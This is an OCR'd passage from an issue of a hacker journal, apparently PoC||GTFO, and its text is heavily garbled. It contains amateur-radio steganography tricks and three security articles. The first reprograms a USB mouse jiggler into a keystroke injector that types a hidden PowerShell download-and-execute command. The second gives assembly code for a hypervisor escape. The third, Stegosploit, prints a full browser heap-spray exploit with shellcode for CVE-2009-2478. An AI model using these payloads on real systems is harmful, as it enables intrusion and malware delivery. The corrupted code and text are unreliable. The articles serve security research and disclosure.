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QPSK performs phase changes in multiples of 90 de- 
grees, providing G3PLX extra symbol space to per- 
form error correction. 

Ahce can use the same trick to form a polyglot 
with BPSK31, but this presents a number of signal 
processing chahenges. Simply using the 90-degree 
shifts of QPSK31 would be a bit of an indiscretion, 
as BPSK interpreters would have wildly varying in- 
terpretations of the message, often decoding the hid- 
den bits to visible junk characters. 

Using a terribly smaU shift is a tempting idea, 
as Ahce's use of balanced 170 and 190 degree transi- 
tions might be rounded out to 180 degrees by the re- 
ceiver. Unfortunately, this would require extremely 
stable and weh tuned radio equipment, giving Bob 
as much trouble receiving the signal as Eve is sup- 
posed to have! 

Instead of adding additional phases to BPSK31, 
we propose instead that the error correction of 
QPSK31 be abused to encode additional bits. Ahce 
can encode data by intentionally inserting errors in 
a QPSK31 bitstream, relying upon Eve's receiver to 
remove them by error correction. Bob's receiver, by 
contrast, would know that the error bits are where 
the data really is. 

4.5 Classic RTTY (ITA2) 

RTTY— pronounced "Ritty"— is a radio extension of 
mihtary teletypewriters that has been in use since 
the early thirties. It consists of five-bit letters, us- 
ing shifts to implement uppercase letters and foreign 
alphabets. Although implementation details vary, 
most amateur stations use 45 baud, 170Hz shift, 
1 start bit, 2 stop bits, and 5 character bits. The 
higher frequency is a mark (one), while the lower 
frequency is a space (zero). 

As more digital protocols other than CW and 
RTTY weren't legahzed until the eighties, ah sorts 



of clever tricks were thought up. Figure 4 shows 
RTTY artwork from W2PSU's article in the Septem- 
ber 1977 issue of 73 Magazine. Lacking computer- 
ized storage and cheap audio cassettes, it was the 
style at the time to store long stretches of paper 
tape as rohs in pie tins, with taped labels on the 
sides. 

Figure 6 describes Western Union's ITA2 alpha- 
bet used by RTTY, which is often— if imprecisely— 
cahed Baudot Code. In that figure, 1 indicates 
a high-frequency mark while 2 indicates a low- 
frequency space. Note that these letters are sent 
almost hke a UART, least-significant-bit first with 
one start bit and two stop bits. 

4.6 Some Ditties in RTTY 
4.6.1 Differing Diddles 

Unlike a traditional UART, RTTY sends an idle 
character— conoquiahy known as a Diddle— of five 
marks when no data is available. This is done to 
prevent the receiver from becoming desynchronized, 
but it isn't strictly mandatory. By not sending the 
diddle character (11 111) when idle, the mark bit's 
frequency can be left idle for a bit, encoding extra 
information. 

AdditionaUy, there are not one but two possi- 
ble diddle characters! Traditionally the idle is filled 
with 11111, which means Shif t to Letters, so the 
transmitter is just repeatedly teUing the receiver 
that the next character will be a letter. You could 
also send 11011, which means Shift to Figures. 
Sending it repeatedly also has no effect, and jumping 
between these two diddle characters will give you a 
side-channel for communication which won't appear 
in normal RTTY receivers. As an added benefit, it 
is visually less conspicuous than causing the right 
channel of your RTTY broadcast to briefly disap- 
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Figure 3: 010100101000 Hidden in PSK31 Idle Bits 
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>.••* * XX X 

cXXX ••••••••• XX •*•«••••• 

• ••••••• • •••••••xxxx xxxx •••• 

• •• •••••••xxxxxxxxxxx xxxxx xxx.«xxxx 

• ••••••••• xxxxxxxxxxxxxx XXXXX X X xxxxx.«^» 

••• •XXXXXXXXXXXXXX XXXXXX XXX XXYX • • • •••••• 

•••••••••••« ••xxxxxxxxxxx xxxxxxxxxxx xxxxx xx» ••• ••tr^ •«•••• 

xxxxxxxxx xxxxxxxxxxxxxxx xxxxxxTX • * • • • . .777 

XXXXXXXX -^^JUCXXXXXXXXXXXXXXX xxxxxxxxxxx. ■ •^^•■fe»..>^ 

xxxxxxx XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX • « « • 

. • • .xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxx^-. • . . .rl* » * • 

. .xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxx . . 

. .xxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx 
..XX xxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx 
....xxxxxxxxxxxxxxxxxxxxx xxxx xxxxxxxxxxxxxxxxx 
••••xxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxx xxxx 

xxxxxxxxxxxxxxxx xxxxxxxx xxxxxxxxxxx xxxx 

xxxxxxxxxxxxxx xxxxxxxxxx xxxxx xxxxt^xxxxxx 

xxxxxxxxxxxx xxxxxxxxxxx xxxx xxxxxxxxxxxx 

•••••••xxxxxxxxxx xxxxxxxxxxxx xxxxxx xxxxxxxxxxx 

XXXXXXXX XXXXXXYXXXXXX xxxxxxxx xxxxxxxxxxx 

..xxxxxx xxxxxxxxxxxxx**xxxxxxxxx xxxxxxxxxx 

» xxxx xxxxxxxxxxxxx* . ••xxxxxxxxxx xxxxxxxxxx 
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... 

• . • 
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Figure 4: RTTY Art of Seattle Slew from the mid 1970's 




Figure 5: Weather Fax 
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Figure 6: RTTY's ITA2 Alphabet 



pear! 

4.6.2 Stop with the Stop Bits! 

RTTY is described in the old UART tradition as 
5/N/2, meaning that it has 5 data bits, No parity 
bits, and 2 stop bits. There's a cool trick to UARTs 
that's worth remembering: the transmitter can al- 
ways have more stop bits than the receiver demands, 
and the receiver can always demand fewer stop bits 
than the transmitter sends. 

4.7 Toe Tappin' CW 

Carrier Wave (CW) modulation— better known as 
Morse code— was the first widely deployed digital 
mode to replace spark-gap transmitters. Designed 
for a human operator to manually use, CW is a per- 
fect choice for easy polyglots. 

As a quick review, CW consists of dots and 
dashes. A dash is three times as long as a dot. The 
off-time between elements of a letter is as long as a 
dot, and the off-time between letters in a word is as 
long as a dash. The off-time between words is seven 
times as long as a dot, or a bit more than twice as 
long as a dash. 

4.7.1 QRSS 

While other protocols have standard data rates, 
Morse rehes on the recipient to adjust to the rate 
of the transmitter. Operators often find themselves 



unable to keep up with an expert or impatiently 
waiting on a station that transmits slowly, so short- 
hand was developed to ask the other side to change 
rate. QRQ requests that the other side transmit more 
quickly, and QRS requests that the other side slow 
down. 



QRSS is a variant of CW in which the message 
is sent very, very slowly. Rather than a dot last- 
ing a fraction of a second, it might last as long as 
a minute! A receiver can then take a recording of a 
very weak signal, slow down the recording, and vi- 
suaUy observe the signal to determine its meaning. 



While protocols such as RTTY and PSK31 don't 
take kindly to the sorts of frequent interruptions 
that normal CW would impart, these protocols 
can easily produce QRSS transmissions that are 
legible by slowing down recordings. For exam- 
ple, Ahce might send "AIBOB AIBOB de AIICE" for 
a dot and "AIBOB AIBOB de AIICE. AIBOB AIBOB 
de AIICE. AIBOB AIBOB de AIICE." for a dash. 



This is of course a bit easy to recognize from a 
waterfah, but it might be a fun way to meet your 
neighbors! 
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4.7.2 From Ethernet to ^ther with Made- 
Hne 



In a row house in Philly 

that was covered with vines 
Was an Ethernet network 

in four twisted hnes 
In four twisted hnes 

they ran to the laundry 
And to the sateUite dish 

and to the pantry 
The twists ended too soon 

and ceased to ahgn 
Interfering with 10 meters 

aU down the hne 

The protocol 

was Madehne. 



It's clear enough that you could transmit Morse 
code through Wifi by sending bursts of traffic, but 
what about wired Ethernet? 

Some folks are very particular when wiring 
CAT5e cable, ensuring that the twisted pairs are 
untwisted at the last possible position before the 
connector. Other folks— such as your neighborly 
authors— are far less particular in their wiring, and 
when the wiring is performed poorly, interference is 
observed near 28.121 MHz! 

Still better, the interference varies with traffic! 
When the network is idle, the interference appears 
as a nice thin carrier wave. When the network is 
busy, the interference grows to be nearly four hun- 
dred Hertz wide. 

The fohowing is a letter of Morse code transmit- 
ted from (poorly) wired Ethernet to the 10-meter 
band through what we are calhng the Madehne pro- 
tocol. This transmission isn't strong enough to carry 
very far, but the Baudhne-generated waterfaU in 
that figure was recorded from outside of a real house, 
with a signal generated by a real Ethernet network. 
The recording was made by an Upper SideBand re- 
ceiver tuned to 28.120 MHz.^^ The narrow-band 
signal at 28.121 MHz becomes wide whenever lots 
of traffic goes across the wired network; in this case, 
from activity on a VNC session. 

'^'^unzip pocorgtfo08.pdf madelinek.wav 




4.8 Patching FLDigi 

AU of this high-falutin' theorizin' don't do a hck of 
good without some software to back it up. Sup- 
posing that Ahce is a modern unix programmer, 
but that Bob hasn't written code for anything more 
modern than a Commodore 64, Ahce wiU need to 
provide him with a GUI apphcation that easily in- 
terfaces with his radio. 

The most direct route for this is to patch FLDigi, 
a popular open source apphcation for digital com- 
munication over ham radio with a hve operator. In- 
ternaUy, FLDigi implements softmodems for CW, 
PSK31, RTTY, WEFAX, and several other proto- 
cols. 

4.9 Part 97; or, Don't be a Jerk! 

Be aware that in general, it's both iUegal and im- 
moral to be a jerk on the amateur bands. Interfer- 
ence is forbidden in amateur radio, not because jam- 
ming research is bad, but because it's rude to stomp 
on someone else's transmission. Cryptography is 
forbidden in amateur radio, not because of any evil 
conspiracy to destroy privacy, but because cryp- 
tography makes a transmission opaque, preventing 
newcomers from joining the conversation. 

So for those of you who do not hve in Nehemiah 
Scudder's oppressive theocracy, please be so kind as 
to keep your polyglot messages unencrypted. Make 
a fox hunt of sorts out of your protocol experimen- 
tation, with the surface PSK31 message advertising 
your caUsign along with the name and parameters 
of your real protocol. 



We hope that this article has taught you a lit- 
tle about radio and signal processing. Get an ama- 
teur hcense, build a station, and start experimenting 
with new protocols on the friendly airwaves. 

73 's from Appalachia, 
— Travis and Muur 
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5 Jiggling into a New Attack Vector 



by Mickey Shkatov 



Note: The manufacturer of the device discussed 
in this article is not distributing anything danger- 
ous. This is a legitimate tool that can be made into 
something dangerous. 

One day, during a conversation with my col- 
league Maggie Jauregui, she showed me a USB 
dongle-hke device labeled Mouse Jiggler and told 
me this nifty httle thing's purpose is to jiggle the 
mouse cursor on the screen. Given my interest in 
USB, I expected that the device might be a cheap 
microcontroher emulating USB HID. If there were a 
way to reprogram that microcontroher, it could be 
made into something mahcious! 

I looked for more information about this pecu- 
har device. I found the exact same model (the MJ-2) 
that Maggie had showed me, but the website hsted 
information about a newer, smaller model, the MJ- 
3. As the website describes it, 

The MJ-3 is programmable, making it 
ideal for repetitive IT or gaming tasks. 
You can create customized scripts with 
programmed mouse movement, mouse 
chcks, and keystrokes. 

"The MJ-3 is programmable." There was reahy 
no need to read any further. This was ah the moti- 
vation I needed. I purchased one onhne. The cost 




of this device was just twenty dohars, which is quite 
cheap if you ask me. 

While I waited for the thing to arrive, I contin- 
ued to read some other interesting facts about the 
device. Here are some highhghts: 

1. MJ-3 is even smaller— roughly the size of a 
dime-at just 0.75" x 0.55" x 0.25" (18mm x 
14mm X 6mm). 

2. IT professionals use the Mouse Jiggler to pre- 
vent password dialog boxes due to screensavers 
or sleep mode after an employee is terminated 
and they need to maintain access to their com- 
puter. 

3. Computer forensic investigators use Mouse 
Jigglers to prevent password dialog boxes from 
appearing due to screensavers or sleep mode. 

A quick look at WiebeTech, the company that 
makes these devices, reveals the forensic nature of 
the use case. 

WiebeTech, the manufacturer of the MJ-3, 
makes ah sorts of forensics equipment including 
write-blocks, forensic erasers, digital investigation 
tools, and other devices. 

I already had plans to sniff the USB traffic, track 
down the microcontroher datasheet, and create a 
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tool to reprogram it. However, I later found a com- 
mercial piece of software that does exactly that. I 
had to download and play with it. 

This software was able to program the MJ-3 to 
be a keyboard, pre-programmed with up to two hun- 
dred key strokes that cycle in a loop. 

To sum up, we've got a tiny USB dongle that 
looks hke a wireless mouse receiver. It is pro- 
grammable with keystrokes, and costs next to noth- 
ing. So what's next? Mahcious re-purposing, of 
course! 

Unhke other programmable USB HID devices— 
such as the USB Rubber Ducky, which has far 
greater storage capacity for keystrokes— we are left 
with only about 200 characters. 

I say characters because it is easy to explain that 
way. Each hne item in a script for this device can 
hold more than a single character. Each item holds 
a combination of modifier keys, a letter key, and a 
delay of up to 255 seconds. The byte-by-byte break- 
down and explanation can be found at the end of 
this article. 

These are 200 characters: 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
000000000000000000000000000000 
00000000000000000000 

Not a lot, but still enough for some fun. Let's be- 
gin by opening an administrator command prompt. 

1. Press Ctrl+Escape. Delay 0 seconds. 

2. Press C. Delay 0 seconds. 

3. Press M. Delay 0 seconds. 

4. Press D. Delay 0 seconds. 

5. Press Ctrl+Shift+Enter. Delay 2 seconds. 

6. Press Left arrow. Delay 0 seconds. 

7. Press Return (Enter). Delay 0 seconds. 

8. Delay 2 seconds. 

Once the last event is done, we might simply teh 
the controher to jump to Event 8 to remain in a 
delay loop and stop executing. 

The result is an eight-hne script for opening 
an administrator command prompt, which was fun 



and easy. However, a red teamer wanting to use 
this thing would need more than just a command 
prompt. How about a PowerSheU download and ex- 
ecute one hner from the Rubber Ducky Exploit wiki 
written by Mubix? If we use a URL-shortening ser- 
vice, we can save a few characters and squeeze that 
into something hke the foUowing 152 characters. 

1 powershell — windowstyle hidden (new— object 

System . Net . WebClient ) . DownloadFile ( ' http 
://bit . ly/lngVd9i','%TEMP%\bob.zip ') ; 
Start-Process "%rEMP%\bob . zip" 



rU leave the rest of the red team thinking to you. 
If you do make a cool and nifty script, please share 
it. You can find the dump and description of the 
sniffed USB communication below. Enjoy! 

Dongle programming communication looks hke 
this, as a sequence of OUT data packets in order. 

• OB 00 30 00 AA 04 00 00 92 

Prefix packet indicating the number of com- 
mands to be sent and ending in some sort of 
checksum (92). The only checksum/CRC hnk 
found in the chent software uses the QT check- 
sum function, which is CRC16-CCITT based. 
Why don't you try to figure this one out? 

• OB 01 32 02 FF 04 00 00 00 

Data packet specifying a command. (Fig- 
ure 7.) 

• OB 02 32 00 00 05 00 00 00 

Data packet specifying a command. 

• OB 03 32 00 00 06 00 00 00 

Data packet specifying a command. 

• OB 04 35 00 01 00 00 00 00 

Data packet specifying the final command 
teUing the controUer to jump to which com- 
mand after the last one has been executed. 

• OC 00 00 00 00 00 00 00 00 

A suffix command to indicate the end of pro- 
gramming. 

Each command to be programmed on the 
controUer is sent over USB. As an example, 
Figure 7 examines the bytes of the "Windows 
key+Ctrl+Alt-l-Shift+A" hne of the script. 
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OB 01 32 02 FF 04 00 00 00 


OB 


A prefix sent with each data packet 


01 


The index of the command sent in this data packet 


32 


Packet type: 




31 is Mouse 




32 is Keyboard 




34 is Delay 


02 


The delay in seconds after the keystroke has been performed by the controller. 


FF 


A bit fiag for indicating key modifiers pressed. 




88 Windows key-10001000 




44 Alt key-01000100 




22 Shift key-00100010 




11 Ctrl key-000 10001 


04 


Represents the keyboard letter A. 




See Figure 8. 


00 00 00 


Padding 



Figure 7: Example Jiggler Packet: "Windows key+Ctrl+Alt+Shift+A' 
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42 


F9 


4 


A 


23 


6 


43 


FIO 


5 


B 


24 


7 


44 


Fll 


6 


C 


25 


8 


45 


F12 


7 


D 


26 


9 


4A 


Home 


8 


E 


27 


0 


4B 


Page Up 


n 

y 


t 


OQ 


Return 


4(^ 


Delete Forward 


A 


G 


29 


Escape 


4D 


End 


B 


H 


2A 


Delete 


4E 


Page Down 


c 


I 


2B 


Tab 


4F 


Right Arrow 


D 


J 


2C 


Space 


50 


Left Arrow 


E 


K 


2D 




51 


Down Arrow 


F 


L 


2E 




52 


Up Arrow 


10 


M 


2F 


[ 


53 


Num Lock 


11 


N 


30 


] 


54 


/ Keypad 
* Keypad 


12 


0 


31 


\ 


55 


13 


P 


33 


1 


56 




14 


Q 


34 


1 


57 




15 


R 


35 




58 


Enter Keypad 


16 


S 


36 




59 


1 Keypad 


17 


T 


37 




5A 


2 Keypad 


18 


U 


38 


/ 


5B 


3 Keypad 


19 


V 


39 


Caps Lock 


5C 


4 Keypad 


lA 


W 


3A 


Fl 


5D 


5 Keypad 


IB 


X 


3B 


F2 


5E 


6 Keypad 


IC 


Y 


3C 


F3 


5F 


7 Keypad 


ID 


Z 


3D 


F4 


60 


8 Keypad 


lE 


1 


3E 


F5 


61 


9 Keypad 


IF 


2 


3F 


F6 


62 


0 Keypad 


20 


3 


40 


F7 


63 


. Keypad 


21 


4 


41 


F8 







Figure 8: Jiggler Keycode Table 
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6 The Hypervisor Exploit I Sat on for Five Years 



by DJ Capelis and Daniel Bittman 

Among its many failings, peer review is especially deficient when it comes to computer security. The idea 
that a handful of busy researchers wih properly review a security system described solely in a paper in the 
time they're reading through a large stack of papers is one of the extreme bhnd spots of our field's academic 
process. 

It is not surprising systems with holes appear in pubhshed hterature. Unfortunately, there's not even 
a good process to correct these situations when holes are found. The authors of papers are not required 
to provide code, so even if one suspects a hole exists, writing a proof of concept requires reconstructing 
the system described in the paper sufficiently weh enough to have something to exploit. And then, of 
course, there's no point in doing any of this work, since "I found a bug in a pubhshed system" is not usuaUy 
pubhshable, unhke every single other branch of science where disproving a pubhshed result is notable. In 
computer science, it's never notable when our papers are broken. 

So neighbors, this was the situation I found myself in for the past five years or so, as I sat on a hypervisor 
bug in a research system no one reaUy used. The authors, meanwhile, ignored e-mails, filed a patent on the 
technology described in their paper, and went on to continue a successful career in research. 

Luckily, in the intervening years, a few things happened: 

1. PoC||GTFO started pubhshing, which means anything our Pastor hkes can be pubhshed here. And, 
especiaUy when the Pastor has been drinking, obscurity is no bar to entry. 

2. I ran into Daniel, who was building an operating system anyway and figured making a PoC for this 
bug was something he might as weU do. (I was too fed-up by this point to spend the time on it.) 

So without further ado, let me describe the system we pwn'd and how we pwn'd it. 

The paper we're breaking in this article is Secure In-VM Monitoring Using Hardware Virtualization^ 
pubhshed in 2009 at the ACM Conference on Computer and Communications Security. As these things go, 
in academia this is considered a "top tier" conference. Back in the dark ages, when dragons roamed the earth, 
and we didn't have support of Extended Page Tables (EPT) in our Intel chips, rapid page table switches were 
expensive. The goal of this paper was to aUow quick switching between security contexts without requiring 
an expensive VMEXIT/VMENTER. The researchers cleverly leveraged CR3 Target Values, which aUow a 
Umited (4, usuaUy) set of addresses that non-root VMX code can set as the page tables base in the CR3 
register. This effectively aUows an untrusted operating system to switch page tables into the code used to 
do introspection without causing a VMEXIT. 

This neat hack caused the average overhead of their syscaU introspection code to go from 46% to 4%. 
Which basicaUy means that their system moved from an unreasonable performance penalty down to a level 
where someone could take it seriously. Which is nice, if they could keep the same security guarantees. 

The security constraints were implemented in the page tables, as shown in Figure 9. 

In theory, this page table setup means that the system under monitoring can never set a CR3 value 
without causing a fault, except by going through the entry and exit gates. Attempts to jump directly to the 
introspection code fail since those pages aren't mapped into the monitored code's view of memory. Attempts 
to change the CR3 value to the introspection code's page tables outside the entry gates fail because the 
next instruction executes in the context of the introspection code, where aU those pages aren't mapped 
as executable. The only way to jump into the introspection code, according to the paper, is through the 
entry/exit gates code present in the shared gate pages and mapped as executable in both. 

What we reaUy want is a way to cause the processor to jump and move page tables at the same time. In 
some other architectures (SPARC, for instance) there's the concept of a delay slot, where some instructions 
take another instruction to fiU otherwise empty pipehne bubbles. In an architecture Uke this, jumping out 
of the security boundary is trivial. . . but this is x86; x86 doesn't have delay slots, right? 

Turns out, that is not exactly true. Quoth the Intel Architecture Manual Volume 2B on the STI instruc- 
tion: 



24 



R-X 





Figure 9: Page Table Security Constraints 



SeaOS Uersion 8.3-betal Booting Up ~ 
7 GB and 616 HB auailable newory (page size=4 KB, knal loc=slab : ok) 
[cpu]: CPUs initialized (boot=e, »ftPs=7: ok) 
[vfsl: Initrd loaded (16 files, 18838 KB: ok) 
[kernell: Kernel is setup (kM=3888, bpl=64: ok) 
[kernell: Setting up enMironment . . . done (i/o/e=38881 [ttyll: ok) 
Something stirs and sonething tries, and starts to climb touards the light. 
Loading nodules. . . nonitor CR3 = 25c873888 
— > TRUSTED: 8 = 250874888 
~> THUSTED: 1 = 25c873888 
trust count 2 

Testing exploit. If you see "HflLTED at 3188", it uorked. 
HRLTED at 3186! 
It uorkedt 



Figure 10: SeaOS Exploit Running on Real Hardware 
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After the IF flag is set, the processor begins responding to external, maskable interrupts 
after the next instruction is executed. The delayed effect of this instruction is provided to aUow 
interrupts to be enabled just before returning from a procedure (or subroutine). For instance, 
if an STI instruction is fohowed by a RET instruction, the RET instruction is ahowed to execute 
before external interrupts are recognized. 

Ah we need to do is turn off interrupts, queue one, route the interrupt handler into the introspection 
code's address space, then MOV the introspection code's page table base into CR3 right after we re-enable 
interrupts with the STI instruction. Then we can just ROP our way through the monitor code and do as we 
please. 

And that's where I stopped at three o'clock in the morning five years ago. I had the concept, but it took 
us another five years to getting around to proving it works on real hardware. As you can see in Figure 10, 
it totahy does. 

The final exploit turned out a httle different. The most straightforward way to implement this in practice 
is to utihze the trap flag (TF). When you enable this, POPF has the same one-instruction delayed behavior 
that we see in STI, and so you merely just set TF with POPF and move a new value into CR3 as the next 
instruction. Thus, the resulting code looks hke this: 



1 


cli 






mov rsp , 0x2500 ; we'll need a stack for the 


interrupt handler 


3 


mov rax , qword [0x1000] ; read the monitor ' s 


CR3 from somewhere in the trap code 




lidt [idtr] ; load the interrupt table 




5 


pushfq ; get the flags 






or qword [rsp], lOOOOOOOOb ; set TF 




7 


popf ; set the flags 






mov cr3 , rax ; change address spaces 




9 


; < TF triggers interrupt here 






loop : 




11 


jmp loop 





6.1 Reproducibility 

Everything you see here can be reproduced by running the code in the vm-exploit branch of the SeaOS 
kernel tree.^^ The code for the proof of concept itself is also in that repository.^^ 

6.2 Concluding Rant 

The scientific community has a structural problem. In computer science, we do not require researchers to 
build real systems that can be scrutinized. We do not have a mechanism for thorough review, so we generahy 
do not bother pubhshing work that breaks another paper. Our field just doesn't consider a broken paper to 
be particularly notable. 

Academics in computer science are too often doomed to talk nonsense unless we fix these issues. Fur- 
ther, researchers in our field are continuing to verge towards irrelevance if they simply follow the system of 
incentives that makes it a better career move to drop a paper and file a patent than do the work of building 
real systems and determining real truths about our machines. 

To the authors of this paper in particular? 
Enjoy your useless fucking patent. 
Love, 
^djc 

^^https : //github. com/dbittman/seakernel/ 
unzip pocorgtfo08.pdf seakernel-exploit.zip 

^^https : //github . com/dbittman/seakernel/blob/vm-exploit/drivers/shiv/ex . s 
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7 Stegosploit 



Stegosploit creates a new way to encode browser 
exploits and deliver them through image files. 
These payloads are undetectable using current 
means. This paper discusses two broad underlying 
techniques used for image-based exploit delivery— 
Steganography and Polyglots. Browser exploits are 
steganographically encoded into JPG and PNG im- 
ages. The resultant image file is fused with HTML 
and Javascript decoder code, turning it into an 
HTML+Image polyglot. The polyglot looks and 
feels like an image, but is decoded and triggered in 
a victim's browser when loaded. 




The Stegosploit Toolkit vO.2, released along with 
this paper, contains the tools necessary to test 
image-based exploit delivery. A case study of a Use- 
After-Free exploit (CVE-2014-0282) is presented 
with this paper demonstrating the Stegosploit tech- 
nique. 

7.1 Introduction 

The probability of an exploit succeeding in compro- 
mising its target depends largely upon three factors. 
Obviously, (1) the target software must be vulner- 
able, but also the exploit code must not be (2) de- 
tected and neutralized in transit or (3) detected and 
neutralized at the destination. 

As malware and intrusion detection systems im- 
prove their success ratio, stealthy exploit delivery 
techniques become increasingly vital in an exploit's 
success. Simply exploiting an 0-day vulnerability is 
no longer enough. 

This article is focused on browser exploits. Most 

■^^http : //utf -8 . jp/public/j jencode .html 

■^^http : / /help . adobe . com/ en_US/FlashPlatf orm/ ref erenci 

■^^http : //aj axian. com/archives/want-to-pack- j s-and-csi 

■^^https : / / www . exploit -db . com/ exploit s/ 9 137/ 

■^^http : //www. slideshare.net/saumilshah/exploit-delivi 



by Saumil Shah 

browser exploits are written in code that is in- 
terpreted by the browser (Javascript) or by pop- 
ular browser add-ons (ActionScript/Flash). When 
it comes to browser exploits, typical means of 
detection avoidance involve payload obfuscation; 
some browser exploits will obfuscate individual char- 
acters,^^ while others will split the attack code 
over multiple script files. Others will use OLE- 
embedded documents or split the attack code be- 
tween Javascript and Flash using Externallnter- 
face.^"^ 

Exploit detection technology relies upon content 
inspection of network traffic or files loaded by the 
application (browser) . Content is identified as suspi- 
cious either by signature analysis or behavioral anal- 
ysis. The latter technique is more generic and can 
be used to detect 0-day exploits as well. 

I began experimenting with exploit delivery tech- 
niques involving containers that are presumed pas- 
sive and innocent: images. As a photographer, I 
have had a long history of detailed image analysis, 
exploring image metadata and watermarking tech- 
niques to detect image plagiarism. Is it possible to 
deliver an exploit using images and images alone? 

My first attempt was to convert Javascript code 
into image pixels, each character represented by an 
8-bit grayscale pixel in a PNG file. The offensive 
Javascript exploit code is converted into an inno- 
cent PNG file. The PNG image is then loaded in 
a browser and decoded using an HTML5 CANVAS. 
Decoding is performed via Javascript. The decoder 
code itself is not detected as being offensive, since it 
only performs CANVAS pixel manipulation. 

Representing Javascript as PNG pixels was ex- 
plored in 2008 by Jacob Seidelin for an entirely 
different reason, compressing bulky Javascript li- 
braries.^^ 

Borrowing from the CANVAS PNG decoder, 
I demonstrated an exploit for the Mozilla Firefox 
3.5 Font Tags Remote Buffer Overflow (CVE-2009- 
2478)^^ vulnerability delivered via a grayscale PNG 
image for the first time at Hack.LU 2010 in my talk, 
"Exploit Delivery— Tricks and Techniques"^''. The 

i/ act ionscript/3/f lash/ external/Externallnterf ace . html 
;-really-well-convert-it-to-a-png-and-unpack-it-via-canvas 
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function packv(b){var a=new Number ( b) . t o S t r i ng ( 1 6 ) ; while ( a . lengt h <8) {a=" 0 "+a} re 
turn(unescape( "%u"+a . substring (4 ,8)+"%u"+a . substring (0 ,4) ) )}var content="" ; cont 
ent+="<pXFONX>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx </FONT></p>" ; cont ent+="<p><FONT>A 
BCD</FONX></p>" ; cont ent+="<pXFONT>EFGH</FONX></p>" ; cont ent+="<pXFONT>Aaaaa </ 
FONT></p>" ; var cont ent Obj ect=document . getElement Byld ( " content " ) ; cont ent Obj ect . s 
tyle . visibility="hidden" ; contentObject . innerHTML=cont ent ;var shellcode="" ; shell 
code+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (208380230 
6) ; shellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (2 
083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (2083802305) ; shellcode + 
=packv (2083818245) ; shellcode+=packv (2083802306) ; shellcode+=packv (2083802306) ; sh 
ellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=packv (208380 
2306) ; shellcode+=packv(2083802306) ; shellcode+=packv (2083802306) ; shellcode+=pack 
v(2083802305) ; shellcode+=packv (2084020544) ; shellcode+=packv (2083860714) ; shellco 
de+=packv (2083790820) ; shellcode+=packv (538968064) ; shellcode+=packv (16384) ; shell 
code+=packv(64) ; shellcode+=packv (538968064) ; shellcode+=packv (2083806256) ; shellc 
Ode+=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b 
14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%ucl20%u0dcf%uc701%uf0e2%u575 
2%u528b%u8bl0%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8bl8%u2058%ud301 
%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uclac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8% 
U247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u 
2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%uebl2%u5d86%u016a%u858d%u00b9%u0000%u6 
850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75 
e0%ubb05%ul347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065") ; while (( shellco 
de . length%4)! = 0){shellcode+=unescape ( "%u9090" ) }var vtables=" " ; for ( i =0; vt ables . 1 
ength <128; i++){ vt ables+=packv (2 105344) }var padding=packv (242 5393296) ; var items= 
1000;var nopsled_size = 1048576; var chunk_size =4096; var merr^new Array();var chunk 
l=padding ; while ( chunkl . length<=chunk_size ) {chunkl+=chunkl }chunkl=shellcode+chun 
kl ; chunkl=chunkl . substring (0 ,chunk_size) ;var chunk2=chunkl ; while ( chunk2 . length< 
=nopsled_size /2) { chunk2+=chunkl } chunk2=chunk2 . substring (0 , nopsled_size / 2) ; var c 
hunk3=padding ; while ( chunk3 . lengt h<=chunk_size ) { chunk3+=chunk3 } chunk3=vt ables+ch 
unk3 ; chunk3=chunk3 . substring (0 ,chunk_size) ;var chunk4=chunk3 ; while (chunk4 . lengt 
h<=nopsled_size / 2) {chunk4+=chunk3 }chunk4=chunk4 . substring(0,nopsled_size/2) ;for 
( i =0;i<items ; i++){id=" "+(i%10) ; if (i <(items /2) ) {mem[ i] = chunk2 . substring (0 , nopsle 
d_size/2 — 1 — l)+id } else {mem[ 1 ] = chunk4 . substring(0,nopsled_size /2 — 1 — l)+id }} var cou 
nt=0;for(i=0;i<items ; i++){ count+^iiem[ i ] . lengt h }document . t i 1 1 e=count ; var searchA 
rray=new Array ( ) ; funct ion escapeData (d) { var b ; var e ; var a=" " ; for (b=0;b<d . lengt h 
;b++){e=d.charAt(b) ; if (e="&" | | e=" ? " | | e="=" | | e="%" | | e=" " ) {e=escape ( e ) }a+=e 
}return ( a) } function Dat aTranslator ( ) { search Array=new Array() ; searchArray [0] =new 
Array ( ) ; searchArray [ 0 ] [ " st r "] = " blah " ; var b=document . getElementByld ("content") ; 
i f ( document . getElementsByTagName ) { var a = 0;pTags=b . getElementsByTagName ( "p" ) ; if ( 
pTags . length >0){while (a<pTags . length ) {oTags=pTags [ a ] . getElementsByTagName ( " font 
" ) ; search Array [ a+l]=new Array ( ) ; i f ( oTags [ 0 ] ) { search Array [ a + 1] [ " s t r " ] = oTags [ 0 ] . i 
nnerHTML}a++}}}}function GenerateHTML ( ) {var a=" " ; for ( i =1; i <search Array . length ; i 
++){a+=escapeData (searchArray [ i ] [ " str " ] ) }} function blowup () {DataTranslator () ; Ge 
nerateHTML ( ) } blowup ( ) ; 



Figure 11: Firefox 3.5 Font Tags Buffer Overflow Exploit for CVE-2009-2478 
